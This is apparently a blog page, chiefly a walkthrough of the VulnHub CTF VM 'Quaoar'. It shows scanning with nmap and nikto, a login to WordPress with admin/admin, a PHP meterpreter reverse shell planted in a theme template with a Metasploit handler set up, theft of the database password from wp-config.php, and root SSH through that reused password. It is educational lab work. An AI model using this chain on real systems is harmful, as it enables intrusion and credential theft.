Just by following and watching their videos you'll learn a lot, not only about different techniques but also about the features each lock and lock-pick brand offers.

In a future post I'll introduce you to the set of locks and picks I use to practice my lockpicking skills.

Hackfest2016 Quaoar Walkthrough

Today I took some time to complete a simple CTF from VulnHub called Quaoar. In the links you can find all the info about how to get this CTF VM.

I downloaded the VM file and opened it with VirtualBox. I started with an nmap scan, not only to find new machines on my network but also to identify their services:

nmap -sV 192.168.1.0/24

And I found:

Nmap scan report for 192.168.1.37
Host is up (0.040s latency).
Not shown: 991 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
53/tcp  open  domain      ISC BIND 9.8.1-P1
80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
110/tcp open  pop3        Dovecot pop3d
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
993/tcp open  ssl/imap    Dovecot imapd
995/tcp open  ssl/pop3    Dovecot pop3d
MAC Address: 2C:F0:EE:30:40:BE (Apple)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Then, my second step was to check the HTTP server:

Quaoar Hack The Planet

I tried downloading both images and extracting their metadata: no luck.

I continued by taking a closer look at the server with nikto, and this is what I found:

# nikto -host http://192.168.1.37
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.37
+ Target Hostname:    192.168.1.37
+ Target Port:        80
+ Start Time:         2017-03-20 18:33:20 (GMT-3)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, inode: 133975, size: 100, mtime: Mon Oct 24 01:00:10 2016
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3
+ Entry '/wordpress/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wordpress/: A Wordpress installation was found.
+ 8348 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2017-03-20 18:34:08 (GMT-3) (48 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

First I tried hitting http://192.168.1.37/icons/README with no luck; a plain text file of no apparent value came up.

Then I tried the ever-popular wordpress directory. Yes! We have a running installation, and it also seems to be a default one!

Wordpress install

We all know the wp-admin folder! Let's just try admin/admin. Whoooaaa, I was in!

Wordpress default passwords

OK, now, with admin access to the WordPress theme editor (which lets you write arbitrary PHP into the theme files), I can just drop a meterpreter payload in there and get a reverse shell.

I created a php file with the meterpreter payload as shown in the following image:

Meterpreter

Then I added the shell code to the theme's 404 template (404.php) using the WordPress theme editor.

Editor

I started msfconsole and set up the listener. Once that was ready, I just forced a 404 error on WordPress by fetching a non-existent post id.

msf > use exploit/multi/handler 
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.38
LHOST => 192.168.1.38
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.38     yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > exploit 

[*] Started reverse TCP handler on 192.168.1.38:4444 
[*] Starting the payload handler...
[*] Sending stage (33986 bytes) to 192.168.1.37
[*] Meterpreter session 1 opened (192.168.1.38:4444 -> 192.168.1.37:40345) at 2017-03-20 19:12:40 -0300

meterpreter > sysinfo
Computer    : Quaoar
OS          : Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686
Meterpreter : php/linux
meterpreter > pwd
/var/www/wordpress
meterpreter > ls
Listing: /var/www/wordpress
===========================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  418    fil   2016-10-26 21:45:26 -0300  index.php
100644/rw-r--r--  19930  fil   2016-10-26 21:45:26 -0300  license.txt
100644/rw-r--r--  7195   fil   2016-10-26 21:45:26 -0300  readme.html
100644/rw-r--r--  4896   fil   2016-10-26 21:45:26 -0300  wp-activate.php
40755/rwxr-xr-x   4096   dir   2016-10-26 21:45:26 -0300  wp-admin
100644/rw-r--r--  271    fil   2016-10-26 21:45:26 -0300  wp-blog-header.php
100644/rw-r--r--  4818   fil   2016-10-26 21:45:26 -0300  wp-comments-post.php
100644/rw-r--r--  3087   fil   2016-10-26 21:45:26 -0300  wp-config-sample.php
100666/rw-rw-rw-  3441   fil   2016-11-30 02:02:01 -0300  wp-config.php
40755/rwxr-xr-x   4096   dir   2016-10-26 21:45:26 -0300  wp-content
100644/rw-r--r--  2932   fil   2016-10-26 21:45:26 -0300  wp-cron.php
40755/rwxr-xr-x   4096   dir   2016-10-26 21:45:26 -0300  wp-includes
100644/rw-r--r--  2380   fil   2016-10-26 21:45:26 -0300  wp-links-opml.php
100644/rw-r--r--  2359   fil   2016-10-26 21:45:26 -0300  wp-load.php
100644/rw-r--r--  33609  fil   2016-10-26 21:45:26 -0300  wp-login.php
100644/rw-r--r--  8235   fil   2016-10-26 21:45:26 -0300  wp-mail.php
100644/rw-r--r--  11070  fil   2016-10-26 21:45:26 -0300  wp-settings.php
100644/rw-r--r--  25665  fil   2016-10-26 21:45:26 -0300  wp-signup.php
100644/rw-r--r--  4026   fil   2016-10-26 21:45:26 -0300  wp-trackback.php
100644/rw-r--r--  3032   fil   2016-10-26 21:45:26 -0300  xmlrpc.php

I got a shell on the server; the only problem was that I was running as the web server user with almost no privileges. I ran cat wp-config.php to see if there were any DB credentials that could help, and I found:

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');

Sooooo, let's remember port 22 was open! I'll try to ssh in as root with that password, since a database password reused for the system root account is a classic.

Bingo! I’m in as root!

Getting root access

So I've completed 2 of the 3 flags for this VM; I just need to find which one is the post-exploitation vulnerability.

Listing the root home in detail, I found a flag:

Getting root access

I searched for the flag but no info was leaked (at least by trying a reverse lookup on crackstation).

Then, looking at the .lesshst file, I got an idea: search the entire filesystem for flag.txt files!

Searching for flags clue

Found 2 flags in total. None of them leaked info on crackstation.

Global search

I went ahead looking for more in the home directory, but that was all.

home directory

To be honest, I'm not sure if there is anything more to take advantage of; maybe the WordPress user credentials?

But by getting root access and finding another unexpected flag I feel like this CTF is complete!

Booting up

This is the first post in the lab, a first attempt to see how content looks and also a way to get to know how the Jekyll platform works.

It's the start, the booting process. By now there are some interests I'd like to write about.

  • Crypto and crypto attacks. Well, it's really, really simple: if you try something outside the standards and the standard implementations, chances are you are vulnerable. Crypto errors are like the new buffer overflow errors we've been exploiting.
  • CTF Walkthroughs. CTFs are fun games and a sort of reality check when talking about pentesting. If you have problems owning a virtual machine created to be owned, that is, one containing vulnerable software installations and configurations and also giving clues on how to "solve" it or get to the next flag, you will feel like hell when trying to pentest a real scenario, where one or more specialists have put effort into securing all the boxes.
  • Tools I've used and/or created, as a way to share knowledge and process.
  • Some other attacks I find really interesting but have left for the future, like wireless attacks and hardware hacking, lockpicking, on-site attacks (Raspberry Pis, homemade antennas, bad USBs, etc.) and social engineering.

Let’s keep booting and see you soon!